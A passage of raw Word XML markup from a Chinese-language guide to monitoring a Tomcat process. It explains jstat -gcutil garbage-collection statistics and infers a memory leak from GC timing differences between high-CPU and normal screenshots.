          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的依据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D625B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00D625B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>omcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进程监控</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00D625B5" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5820410" cy="882650"/>
            <wp:effectExtent l="19050" t="0" r="8890" b="0"/>
            <wp:docPr id="61" name="图片 10" descr="&lt;3&g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lt;3&gt;"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5820410" cy="882650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5868035" cy="1017905"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="70" name="图片 11" descr="&lt;4&g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t;4&gt;"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId99" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5868035" cy="1017905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>命令中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -gcutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>表示统计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>情况，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5125</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pid,10000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>表示没</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>统计一次，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>表示一共统计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>次</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>结果中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>区，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>区，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>区，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Old</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>区，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Permanent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>区，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>YGC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>yong GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>次数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>YGCT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>yong GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>执行的总时间，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FGC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Full GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>次数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FGCT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Full GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>总时间，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GCT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>总时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>上面图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;3&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>占用率高时的截图，图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;4&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为正常情况下截图。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>很明显的看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>次数相差不大的情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>耗时存在很大的差距，推测此时系统中可能存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内存泄漏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的情况</w:t>
      </w:r>
      <w:r w:rsidR="00A16C4E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00A16C4E" w:rsidRPr="00A16C4E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（持久代与年老代满了）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="50" w:firstLine="90"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
